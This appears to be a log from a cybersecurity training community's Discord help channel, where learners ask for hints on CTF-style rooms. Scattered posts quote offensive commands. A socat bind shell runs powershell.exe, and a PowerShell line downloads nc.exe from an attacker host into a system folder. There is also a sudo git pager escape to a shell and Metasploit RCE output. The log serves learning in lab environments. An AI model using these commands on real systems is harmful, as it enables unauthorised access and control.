i use my own kali and i download the file and use the strings command and inject it to txt file then sort it but how I find the right flag?
on the internet i find many use "ida" tool but i don't have it on my kali

white salmon
#

starting on the first function of strings2.exe (entry)

placid plume
#

yes ,thanks i fing a git calon in github

#

and use a guide i find

#

it is interesting but for first time like "where i start"

white salmon
# white salmon starting on the first function of strings2.exe (entry)

there are some declarations, starting with a char and ending with a pointer
||the undefined variables get hexadecimals values which u need to use a converter to get the flag back, the first variable u already have, it's a F||
as follows:
||| local_2c = 'F';||
||local_2b = 0x4c;||
||local_2a = 0x41;||
etc

white salmon
knotty peak
#

Im working on the what the shell room and the task where I am to try one of the payloads from the payload of all things github and I am a bit confused on how to use them

#

I created a .elf file but I am not sure how I am supposed to use it for a meterpreter shell

knotty peak
left thunder
knotty peak
left thunder
knotty peak
left thunder
green minnowBOT
#

Gave +1 Rep to @left thunder

barren cloak
#

Hello everyone,

I'm having a little trouble with webenum1 and gobuster vhost task 6.

With a little help I was able to do the -append-domain to get the vhosts correctly, but now I don't know how to do a dir scan for the flag in the vhosts. I was told I will need to edit my /etc/hosts file but I don't know what the IP address is of the 2 vhosts I want to scan.

Any help would be appreciated... how do I find/get the IP addresses of the vhosts if I need to add them to my /etc/hosts file?

#

gobuster vhost is the command with some parameters. It's part of gobuster.

#

I think I found an answer/hint that I'll try.

#

to edit /etc/hosts

#

fSorry, I thought I mentioned gobuster in my initial post.

#

I'm still a little new and learning... I'm not sure what you were trying to ask about what is a vhost then. I understand that it means virtual host and that it's not just a gobuster thing but in this context I'm not sure what you're asking.

#

It looks like the edit I made to the /etc/hosts file is working now.

#

I have a little more to learn and research with the /etc/hosts file and adding the vhost names to the same IP.

like how/why:

xxx.xxx.xxx.xxx webenum.thm extra1.webenum.thm extra2.webenum.thm

works. I get the "extras" are the virtual hosts. Would *.webenum.thm still work instead of having to spell out all the vhosts? I guess I can try it out and test it for myself.

knotty peak
#

HI I need help with the what the shell room https://tryhackme.com/room/introtoshells#
I am using the kali web based machine on THM
I am on task 13 I am having trouble with getting bind shells on the windows machine:

I have successfully obtained a reverse-shell with netcat and socat
I uploaded a webshell which I used to get the reverse shell with nc and socat
But when I try to use this command(on my current revershell) socat TCP-L:4444 EXEC:powershell.exe,pipes on the reverseshell when I run this command TCP:<target ip>:<4444> - i get socat[22548] E connect(5, AF=2 10.10.12.59:4444, 16): Connection refused
If I try the same command url encoded for the webshell i uploaded I get the same response when I try to connect back

Netcat:
When I run a listener on my kali machine using nc -nlvp 4444 and attempt to connect back to this via the reverse shell i had previously caught I do not receive the connection back

knotty peak
#

I also need help with "Create a 64bit Windows Meterpreter shell using msfvenom and upload it to the Windows Target. Activate the shell and catch it with multi/handler" I am able to do this successfully with php version of this payload but I am curious how I am supposed to do it with .exe version of the payloads

#

any help is appreciated thanks in advance!

white salmon
#

I'm having trouble with Penetration Fundamentions. It's asking "What testing process" but answers like low-level, high-level, Grey/black/white doesn't seem to be resolving it

lucid junco
#

Look at the number of * in the answer box.

white salmon
#

oh my... i was using a hyphen... you are right and I should read more caefully. Thanks Scrubz!

hardy sedge
#

Hi I am trying to complete the THM ice room and it said that the firewall has been disabled but still nmap output says ports are in filtered state

#

can anyone tell me why this is happening

#

─(venkyγ‰Ώvenky)-[~/Desktop]
└─$ sudo nmap -sS -Pn -A -p8000 -oN m.txt 10.10.200.27
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-13 16:11 EDT
Nmap scan report for 10.10.200.27
Host is up (0.00014s latency).

PORT STATE SERVICE VERSION
8000/tcp filtered http-alt
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS details: Actiontec MI424WR-GEN3I WAP, DD-WRT v24-sp2 (Linux 2.4.37), Linux 3.2, Linux 4.4, Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012, VMware Player virtual NAT device

TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 0.09 ms 192.168.244.2
2 ... 30

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.49 seconds

tired solstice
#

hello, I had a question on the room metasploit meterpreter

#

search -f secrets.txt

#

Everytime I run that command it just seems to hang. Is this command supposed to be pretty slow?

#

I looked up a few guides and the command is correct and everything else is pretty smooth in this room. Didnt know how heavy this module was πŸ™‚

#

and after 3 attempts it worked perfectly nevermind lol

white salmon
tired solstice
#

I thought we were supposed to get better VM's when we subscribe? I might be wrong there

white salmon
tired solstice
craggy prism
#

For the hashing - crypto 101 room I am supposed to go and crack a hash using online methods. I tried using crackstation.com, but that did not work and I cannot find any other resources other than trying to use hashcat for the first time. Any help I can get would be apprciated.

sharp bolt
white salmon
#

Hello everyone

#

Im.new here

#

Nice meeting everyone

white salmon
#

ayoo

glacial bobcat
#

hey. Anyone available who can help me with the room set? I'm on the last step.

#

I already edited the exploit to run commands. I use chisel to forward the port. I tested the cmd oneliner with my user - but the exploit doesn't execute

#

this is what metasploit shows me:

[*] 127.0.0.1:2805 - Sending host info to 127.0.0.1:2805
[*] 127.0.0.1:2805 - Executing Windows RCE CMD for windows/x64/exec
[*] 127.0.0.1:2805 - Sending malicious handshake to 127.0.0.1:2805
[*] Exploit completed, but no session was created.
glacial bobcat
#

it worked. πŸ˜„

craggy prism
white salmon
sharp bolt
white salmon
#

smb share, I'll try ssh

white salmon
sharp bolt
sharp bolt
white salmon
#

Apparently so. Originally I was using "John Cactus" instead of just "cactus@ip" and once I did that it gave me an incorrect format thing so I looked up a walkthrough

sly basin
#

Hi, i was studying the room "linux privilege escalation" and in the last where the escalatin is done with NFS, am not able to execute the C file, that i upload in it.
It giving the error
./exp: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.34' not found (required by ./exp)`

#

I tried to change the code with this above version, but still the error was their.
The initial c code was same the one mentioned in the lesson

sly basin
#

It good now.
and you mean live of the land within nfs?

#

but escalation within system and using nfs is different right.
The task was to escalate through nfs to the server

#

ok i understand 🀝

serene badger
#

holla, i could use a hint on takeover, i tried subdomain enum with fuzz but so far nothing, also tried some manual guesses. dirbuster is also not giving much interesting back? am i missing something?

pine dust
serene badger
#

Nope

#

Tried lepus as well, which said it found 1 but it is unresolved

#

And doesnt seem to give any result

pine dust
#

Can you show us your command for fuzz ?

strong silo
#

hey, I'm doing Anonymous Room and I don't know why but I can't get a connection back from my reverse shell. I don't know if its because of that, but I deleted the clean.sh and then uploaded a new one with a bash reverse shell script. But I still have no connection

subtle basin
#

hello i have a big problem on the room "Hackpark"

#

we have to login in a login page

#

i know the username and the password

#

im sure about password and username

#

but it didnt work

sharp bolt
tidal wyvern
#

hi can help me with throwback-timekeeper

#

i cant get a shell bk

sharp bolt
#

Are you sure your hydra command is correct? Could be that the message it's looking or is wrong so it's giving you correct password because it can't find the text you specified

subtle basin
#

Can i send you the id in private message ?

sharp bolt
deep idol
#

ok so im doing the Looking Glass CTF from the wonderland series and im kinda stuck at the nmap scan where im only getting loads of unnecessarily open ports with ssh (i know its intentional) ... so any hints regarding that one im just stuck

#

i tried different nmap scan like Xmas ... i even utilized --scanflags and scanned with some different combinations of packets sent

frosty wigeon
#

I'm doing the file inclusion room and I'd like a hint if possible. I'm closish to finishing this third challenge

frosty wigeon
#

do we have to use burpsuite for challenge 3? I'm trying to get this to work using inspect element and it's not playing nice

young gulch
#

Yeah doing it in Burp is easier

frosty wigeon
#

I'm having issues getting burp to work, I've never used burp before

frosty wigeon
#

yeah burp can't find the box. I'm running burp via attackbox and it can't find the room vm

tidal wyvern
pastel scarab
#

In Sakura room Task 5 question 3:
What is the URL for the location where the attacker saved their WiFi SSIDs and passwords?
even when i put correct link is showing wrong answer please if someone has a link which is accepted as answer tell me

pine dust
strong silo
frosty wigeon
#

yeah I didn't know you had to have foxyproxy active.

#

it's fixed, I finished it a few days ago

pine torrent
#

Regarding Task 4- Manual Discovery - Content discovery - i am not sure where to look at to find the secret area. Any hints?

knotty peak
knotty peak
pine torrent
peak badge
#

i dont know how to make the Q4 of Walking An Application

rain wigeon
peak badge
#

i got it, thanks

pine torrent
#

Brain is fried. Content discovery Manual discovery Task 6 . The flag i find does not work. Anyone passed this stage?

calm moss
#

Yes. I got a different flag

#

Make sure you're actually going to the right page

pine torrent
white salmon
pine torrent
lucid junco
peak badge
#

why this is not working ?

white salmon
#

Try these quotes maybe " "

lucid junco
#

Yeah

peak badge
#

thanks

pine torrent
lucid junco
#

Did you try the long url?

sly basin
#

i am planning to change my username, but how to know if my username that iam willing to change to, is already available?

pine torrent
lucid junco
#

Did you read all the links?

sly basin
lucid junco
#

Nobody has that username then.

sly basin
#

ok gotcha, thank you

pine torrent
peak badge
#

i can't do this, i need help

left thunder
peak badge
#

this was to show me the name of users who already have an account

left thunder
# peak badge

You have a typo in "urlencoded", best to use the copy paste clipboard to copy such long commands to the attackbox

peak badge
#

aaa thanks

white salmon
#

I'm doing the Pickle Rick room but when I try to ping the machine I'm not getting any response but it's showing I'm connected with openvpn. Is this normal?

ebon jewel
#

can you access site in browser

white salmon
white salmon
ebon jewel
#

then it works. mihgt just you internet is bit slow or smth

white salmon
#

Will restarting the machine help?

ebon jewel
#

can you ping -c 3 10.10.10.10

ebon jewel
white salmon
#

I think I will have to restart it's strange that I can still see the page though but can't ping

ebon jewel
#

try

white salmon
#

I terminated the thm machine. I restarted my vmware kali and connected to the openvpn. I started the thm machine. I can view the picklerick web app in my machine but can't ping or nmap scan the ip address of the active machine. But it did let me ping scan the webapp when I use address rather than the IP address. Not sure if something is blocking stuff or a vmware issue or a issue on tryhackme side.

lucid junco
lucid junco
#

!vpnscript

proud scarabBOT
pine torrent
# lucid junco

Been using the link that gives me a tag including the word β€˜static’

pine torrent
lucid junco
crisp forum
#

Im not stuck, i know what I'm looking for, but the GPS thing is weirdly set up and Wigle isn't giving me results

#

This is from the OhSINT roon

#

annoying asf

obtuse robin
#

the server side filter wont accept php and the hint on it is Commands do not start with a "-". Just use the word itself.

lucid junco
obtuse robin
#

Bruh i was so sure they would have filtered out php5 too i didnt even try it

pine torrent
green minnowBOT
#

Gave +1 Rep to @lucid junco

bitter ocean
#

I am in the Corp room. I am stuck.

#

I have a jpg but do not know how to add it.

#

I am just typing the first steps.

#

System.Net.WebClient).Downloadfile('http://10.8.133.41.:8000/nc.exe', 'C:\Windows\System32\spool\drivers\color\nc.exe')" it says exception downloadfile with 2 arguments

bitter ocean
#

never mind- I decided to type the command and see what happened. I got the text file with the flag. \Users\dark\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt πŸ˜ƒ

pine torrent
#

At the authentication bypass Task 2 , the instructions doo not teach you how to create a file with a line of code..

lucid junco
strong silo
green minnowBOT
#

Gave +1 Rep to @strong silo

strong silo
#

Maybe I haven't understood your question correctly. You don't know how to create a file using the terminal or you thought that your file should contain some code inside?

white salmon
green minnowBOT
#

Gave +1 Rep to @lucid junco

rigid compass
#

Hi !
im actually doing the Wonderland box. i have access to the server via ssh, but now i'm stuck, so there is my question :
Do i need to know the Alice's world to pwd this box ?

#

or can it help to know the story ?can it be useful to know the story?

lucid junco
#

Where are you stuck?

inner token
#

has anyone got the ivpn.exe service to recompile and start on Osiris -appear to be stuck with getting the service to start

brave adder
#

Does anyone have a hint for Linux Forensics Task5, i seem to be blind. i can't find the histsize in the .bashrc file

#

nvm was looking in the wrong file

pine torrent
#

It’s nuts how much hand holding i need.. Task 4 Authentication bypass. I created my username , my account but no support ticket leading me to Robert. I tried to include my username in the code in different locations (to no avail..)

#

Is there a junior Linux course included cause i just seem not to understand much?

pine torrent
rigid compass
green minnowBOT
#

Gave +1 Rep to @lucid junco

rigid compass
#

will the website be usefull again ?

lucid junco
lucid junco
#

This is by far one of my favourite rooms.

rigid compass
#

hmm.. Thank you for the hiint. I've already check this command, but i will continue to investigate it !

crisp patio
dense fulcrum
#

hi there, regarding outlookleak room

#

why the listeners doesn't work on my kali, and only work on attack machine

strong silo
strong silo
crisp patio
golden fjord
#

Hi there..I need hint about how to proceed for Task1 in "WYWM Hackathon Aug 2021" room

#

I tried the network scan and tried the exploits also but not successful

#

currently stuck about how to proceed next

bitter ocean
#

I see people adding graphics. How do you do this. I cannot figure that out?

violet olive
#

in intro to c2 task 4 not sure my armitage ui isnt loading up for me ive done all the steps right

strong silo
bitter ocean
forest drift
#

!docs verify

proud scarabBOT
weary wasp
#

hello,in room named "agent sudo", i knew it needs to change the UA,but how do I know if I need to change UA to a specific character?

#

is anybody there

tropic garden
tropic garden
#

In the NetSec Challenge room, in the last question or challenge, can someone give a nudge on the type of scan to use? I've tried several combinations, but can't get it to work. There was one I have yet to try, but having issues finding a zombie host.

lucid junco
tropic garden
upper socket
#

any hint for Devie room?

lucid junco
quaint dirge
#

Pyramid of pain Task 2 has a new hash. I Inputted the file name and does not like it. I have tried every way possible and I have even tried to look up the answer on Google. Can someone help?

ebon jewel
#

what name you did put ?

quaint dirge
#

X97M.Downloader.44710

#

Wait

#

sorry, i meant trojan.valyria/x97m

ebon jewel
#

!docs verify

proud scarabBOT
ebon jewel
#

will help to show screenshots and will be easy to help

quaint dirge
ebon jewel
ebon jewel
#

you did put that hash in search of virustotal

quaint dirge
#

Yes

ebon jewel
quaint dirge
#

Purchase_Order 6862.xls?

ebon jewel
#

try it...

quaint dirge
#

It says that is incorrect

#

I found it. Sales_Receipt 5606.xls

ebon jewel
#

πŸ™‚

quaint dirge
#

Thank you!

ebon jewel
#

np

quaint dirge
#

Also, this is my first real discord chat.

#

I know that sounds weird.

ebon jewel
#

!docs verify

proud scarabBOT
ebon jewel
#

to get conected

quaint dirge
#

Thank you. I just connected

ebon jewel
quaint dirge
#

I will check it out.

upper socket
#

Please give a hint for Devie. I need help how can i send input to tigger eval() function.

weary wasp
#

any hint for Wonderland room?

deep thunder
#

Hi, I could use an hint for privilege escalation for the room LinuxAgency

#

When using the command of GTFOBIN: sudo -u reza PAGER='sh -c "exec sh 0<&1"' git -p help

deep thunder
#

It's fixed is it because I didn't upgrade my shell anyone has idea if that could be the problem?

lucid junco
alpine kestrel
#

@umbral umbra ⬆️ this message got sent in nearly all channels..... makes shadow not wanna answer the question

ripe berry
#

@alpine kestrel here

#

what does it mean

alpine kestrel
#

ah...

#

have you used burp suite in the past???

#

because that is probably easier then curl in this instance

ripe berry
ripe berry
#

but it didn't work out, i lack experience

alpine kestrel
#

well first try and do a get request then capture that in burp... right click... click send to repeater... rightclick again.... select change method to post

#

and you should be able to handle it from there hopefully

#

or you can go through the burp rooms on tryhackme to learn this

ripe berry
green minnowBOT
#

Gave +1 Rep to @alpine kestrel

alpine kestrel
#

no problem

#

good luck and have fun

ripe berry
green minnowBOT
#

Gave +1 Rep to @alpine kestrel

alpine kestrel
#

oh glad it worked.. good job on hacking the thingy code

ripe berry
#

help

#

challenge 3 in file inclusion is filtering numbers and slashes

#

idk how to bypass that filter

quick holly
#

@jaunty elm
Hey hey, I've just finished the Inferno room, and I wonder how you made the auto-killer for TTY shells. Would you mind DMing me how? thanks :>

green minnowBOT
#

Gave +1 Rep to @jaunty elm

fiery osprey
#

Hi, I'm working on the SQL injecion module (on Jr pentester path)

#

I don't understand how to do it..

#

(forget about it lol )

#

ima so dumb

ebon geyser
#

Hello everyone. Im stuck on the nmap learning path

#

the question im stuck on is "How would you tell nmap to scan all ports?"

#

Kinda dumb I know but I cant seem to get it. Any hints would be greatly appreciated.

#

nvm I got it

peak badge
#

somebody know how to make this challenger 3 ?

peak badge
#

I am know, i saw somebody make by curl, but i want to make by http

white salmon
#

i'm catching up

#

I've done this room but forgot and don't have a write-up for it

#

as I'm completing the room though, I can give you another hint:

#

||Hint: try different GET, POST, DELETE methods of request ||

#

||Perhaps the POST method?||

weak wasp
#

Hi guys

#

need help with Room Snort
when I try to enter in terminal sudo ./traffic-generator.sh the response is "command not found"

#

any hints?

white salmon
#

Otherwise if you are not, you will need to declare the entire path

weak wasp
#

sorry

#

my stupidity

#

solved

#

@white salmon Thank for the hint

green minnowBOT
#

Gave +1 Rep to @slender kelp

knotty peak
#

I dont understand what it means when it says this privilege escallation vector is there not discoverable when enumerating files looking for SUID.

#

Does this mean it mean when looking for SUID vulnerabilities you wont be able to find capabilities vulnerabilities at the same time for just vim and its copy?

#

I am not sure why it is included in the capabilities section of the room

cold fulcrum
#

Sysinternals - Task 5 - TCPView
I think i found the answer but it doesn't fit the field. Please help me
||Microsoft Corporation||

rustic sphinx
#

Thats apprently the right answer

#

!docs verify

proud scarabBOT
rustic sphinx
#

verify, send a spoilerd screenshot

proud scarabBOT
#
TryHackMe
Here are all of the possible topics!
!docs url

Visit the help site

!docs verify

Learn how to sync your THM profile to Discord

!docs student

Learn about our student discount programme

!docs levels

View all the TryHackMe levels & point requirements

!docs room-creation

Get started with making TryHackMe room

!docs room-review

Learn about the TryHackMe room review process

!docs api

Read about the TryHackMe API

!docs koth

How to play TryHackMe's King of the Hill (KoTH)

!docs free-path

What rooms should you do? A free guide for beginners

!docs bug-bounty

Learn about TryHackMe's Bug Bounty Programme!

cold fulcrum
tropic garden
alpine kestrel
#

well you can use -perm /4000 which will give you different results to a degree

pallid yarrow
#

what will be the answer in the fakebank quiz

#

I have answered $767.68 as fakebank.com shows. but it says wrong

stuck fractal
pallid yarrow
#

then what

#

When you've transferred money to your account, go back to your bank account page. What is the answer shown on your bank balance page?

#

it shows 767.68

#

Can you kindly help me out

trim haven
#

What is the answer shown on your bank balance page?

pallid yarrow
ripe berry
#

Help

#

I don't get the question

#

Is it supposed to be where?

#

Yup

#

Can some Admin change it please since it's confusing ??

#

Is supposed to be where instead of how

ebon jewel
ripe berry
lucid junco
ripe berry
#

i don't get it

#

it's not necessarily to be updated but it makes more sense when it's "where"

lucid junco
#

Where did you learn to play the piano?
How did you learn to play the piano?

#

Two sentences swapping out how and where, with the context.

ripe berry
#

I Learnt English at school
I learnt English by talking to people

#

Same Concept here, just two different questions already

frosty wigeon
#

Can I have a hint for the OSWAP top 10 room, task 19. I'm looking at page source and not seeing anything.

cold eagle
frosty wigeon
#

oh

versed quiver
#

helll guys

#

im stuck at a question

#

i need tyour help

#

can anyoone herere help me

toxic spindle
#

At the nmap tutorial, on task 4, Discovering Live Hosts, I put the correct answer for the first question, but it says that it is not correct. Does anyone know why???

toxic spindle
#

What is the type of packet that computer1 sent before the ping?

#

and i put ARP Packet

lucid junco
#

can you link the room?

toxic spindle
lucid junco
toxic spindle
#

yes

lucid junco
#

What happens?

toxic spindle
#

you send packets to see if the host is up or not

lucid junco
#

And what does the host do if it's up?

toxic spindle
#

sent back

#

ack

lucid junco
#

Even if you look just above the question.

#

you should work out half your answer is correct, one half isn't.

toxic spindle
#

aa okey

#

thank you

eager wyvern
#

Hey guys what programming language is better to start

white salmon
#

Not a particular room I need help with but feel it fits here. When I run an Nmap scan on a room machine, I understand I am scanning that machine of that room. Lets say its a 10.xx.xx.x address. If I switch off that machine and scan the same IP then presumably it's a different person's computer? Am I missing something?

left thunder
calm moss
#

The interesting question of how well firewalled off from each other thm users are

white salmon
median narwhal
slim charm
#

So I looked up the answer for this page, but I dont really know where to get the answers for question 3 and 4 of task 5... Can anyone explain it to me? For me the page didn't really specify what the Carbanak layer was that well
https://tryhackme.com/room/redteamthreatintel

#

Ive opened up the APT 39 Att&ck navigator but idk what I'm looking for πŸ˜†

#

I was looking for someone to point me in the right direction, so I know how they got the answers

slim charm
#

I figured it out after watching a video... I didnt realize you had to look for Carbanak on the Mitre website

white salmon
green minnowBOT
#

Gave +1 Rep to @left thunder

sonic drift
#

Hi all been fiddling for ages trying to get attackbox working properly now i've hit another wall... can anyone help?

#

Workin on linux Fundamental 3 task 4 have launched python3 -m http.server, not when a go to wget the .flag.txt i just getting nothing....

#

Hahaha nevermind, a little research goes a long way. it never occurred to me to open a second terminal..

timid sedge
#

Hello! I think I could use some help with room sqlinjectionv2 task #8. (I think) I was able to find the two table names, but from there I am a little bit lost. Thanks!

#

ok that's just mean to put analytics_referrer lol

#

ok problem solved thanks

bitter ocean
green minnowBOT
#

Gave +1 Rep to @forest drift

bitter ocean
stable urchin
#

I dont understand why this answer is not being accepted?

#

smbclient //10.10.43.92/secret -U suit -p 445

#

i tried port 139 too

lucid junco
stable urchin
#

nevermind I was using thee wrong ip address

stable urchin
lucid junco
stable urchin
green minnowBOT
#

Gave +1 Rep to @lucid junco

white salmon
#

I'm trying to do the Blue room but do we have to use our own vm or can we use the THM attackbox/kali. I tried but when I got to the point of needing to set the LHOST in metasploit I didn't know what to do, I looked up a walkthrough but they used thier vpn and were on their personal vm. What do you set LHOST if you are using the thm attakcbox/kali? I'm also trying on my own machine but nmap is saying it has 3 and a half hours remaining.

unborn moon
#

Hey, have you looked up/understood what LHOST is? You can use the Attack box or your own VM with OpenVPN, since both options will be connected to the same network as the vulnerable machine

white salmon
unborn moon
#

So then what would you put as the IP if you were using the Attackbox?

unborn moon
white salmon
unborn moon
white salmon
#

The attackbox IP for LHOST

unborn moon
#

When you have a chance to try the room again, let me know if you manage to get it to work

green minnowBOT
#

Gave +1 Rep to @unborn moon

odd karma
#

@lucid junco @nocturne garden Moving on to thank the support i had, thank you very much, i was able to conclude the room. Thank you very much.

green minnowBOT
#

Gave +1 Rep to @lucid junco

lucid junco
#

+rep @nocturne garden

green minnowBOT
#

Gave +1 Rep to @nocturne garden

white salmon
green minnowBOT
#

Gave +1 Rep to @unborn moon

unborn moon
green minnowBOT
#

Gave +1 Rep to @loud merlin

rustic sphinx
#

!dark

proud scarabBOT
#
DarkStar7471
I plead the fifth.
ripe berry
#

k

#

@ebon jewel im here

ebon jewel
#

y

ripe berry
#

so i found many files

#

i found two key words

#

idk if those are Username / pass

#

they didnt work with the ssh

#

BORG_IDXd
BORG_SEG@

#

those

#

Are they any important?

ebon jewel
#

hmm one sec

#

can you post pic of what you do atm

ripe berry
#

im not doing anything

#

im trying to find a valid credientials

#

credintials

ebon jewel
#

did you find passwd file and squid.conf

ripe berry
ebon jewel
#

did you enumerate with gobuste and find two directories

ripe berry
#

oh mb i didnt go to the other one

ripe berry
#

i don't understand the text infront of the music archive

#

is this a user?

#

must be

ebon jewel
#

if you can post pic will help.

ripe berry
ebon jewel
#

oh that..

ripe berry
#

this is the text found in passwd

#

that's a hash?

#

how do i crack it

ebon jewel
#

that is correct yes.

#

so. what do you think how do we crack offline hash ? there is 2 most used app/command

ripe berry
ebon jewel
#

yes

ripe berry
#

K will try it

ebon jewel
#

ill let you know. you do not need to specific the format. just simple john with wordlist file and that file

ebon jewel
#

you did get password that starts with s

ripe berry
#

yes

ebon jewel
#

just dont post spoil πŸ™‚

ripe berry
#

sorry

ebon jewel
#

who sais it's password for ssh or smth like that ?

ripe berry
#

for what then

ebon jewel
#

might be for something else ?

ripe berry
#

hmm

#

lemme see

ebon jewel
#

you have archive.tar file ?

ripe berry
#

it has nothing

#

worth

#

like just random text i mentioned before

ebon jewel
#

hmm... one of file in that archive.tar can give you hint for solution. try check most OBVIOUS file

ripe berry
ebon jewel
#

what is most first file that you will READ if you need help

ripe berry
#

xD

#

README

ebon jewel
#

try

ripe berry
#

oh ok

ebon jewel
#

it says is backup repo. the app name is hint what you need to apt-get install to move on

#

one hint. the archive file is more than just simple archive.tar

ripe berry
#

it says the archive is not a valid repo

#

check repo config

ebon jewel
#

did you install backup app ?

ripe berry
ebon jewel
#

y

ripe berry
#

yes i am using it